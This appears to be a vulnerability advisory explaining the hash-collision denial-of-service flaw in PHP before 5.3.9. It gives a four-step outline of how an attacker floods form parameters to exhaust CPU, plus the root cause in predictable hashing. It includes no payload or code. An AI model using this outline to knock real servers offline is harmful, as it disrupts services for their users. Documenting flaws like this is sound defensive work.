PHP before 5.3.9 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.
PHP versions prior to 5.3.9 are vulnerable to a denial-of-service (DoS) attack. Attackers can exploit a flaw in how PHP handles hash collisions in form parameters, leading to excessive CPU consumption and potentially rendering web applications unresponsive.
Step 1: Payload Preparation: The attacker crafts a malicious HTTP request containing a large number of form parameters. These parameters are designed to collide within PHP's hash function.
Step 2: Request Submission: The attacker sends the crafted HTTP request to a vulnerable PHP application.
Step 3: Parameter Processing: The PHP interpreter receives the request and begins processing the form parameters. Due to the hash collisions, the interpreter spends a significant amount of time comparing the parameters.
Step 4: Resource Exhaustion: The CPU usage of the PHP process spikes as it attempts to resolve the hash collisions. This leads to a denial-of-service condition, as the server becomes unresponsive to legitimate requests.
The vulnerability stems from a weakness in PHP's hash function used for processing form parameters. Specifically, the hash function used for the $_POST, $_GET, and $_REQUEST superglobals is susceptible to hash collisions. Attackers can craft a large number of form parameters that all hash to the same value. When PHP processes these parameters, it must compare each parameter against all others that hash to the same value, leading to O(n^2) complexity in the worst-case scenario. This causes a significant increase in CPU usage, effectively creating a DoS condition. The root cause is the lack of a robust collision resolution strategy and the predictable nature of the hash function, allowing attackers to pre-calculate collisions.